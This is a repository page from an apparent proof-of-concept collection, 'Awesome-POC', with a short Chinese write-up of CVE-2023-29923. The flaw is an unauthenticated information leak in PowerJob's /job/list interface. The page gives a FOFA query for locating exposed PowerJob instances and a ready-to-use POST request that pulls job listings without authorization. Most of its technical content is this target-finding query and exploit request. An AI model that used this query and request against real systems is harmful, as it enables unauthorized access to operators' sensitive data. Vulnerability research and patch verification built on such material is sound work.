Awesome-POC/Web应用漏洞/PowerJob list 信息泄漏漏洞 CVE-2023-29923.md
2023-04-24 16:40:43 +08:00

34 lines
525 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# PowerJob list 信息泄漏漏洞 CVE-2023-29923
## 漏洞描述
PowerJob list接口存在信息泄漏漏洞攻击者无需通过授权就可以访问授权的接口获取敏感数据。
## 漏洞影响
```
PowerJob
```
## FOFA
```
app="PowerJob"
```
## 漏洞复现
登陆页面
![image-20230424163841725](images/image-20230424163841725.png)
验证POC
```
POST /job/list
Content-Type: application/json
{"appId":1,"index":0,"pageSize":10}
```
![image-20230424163855220](images/image-20230424163855220.png)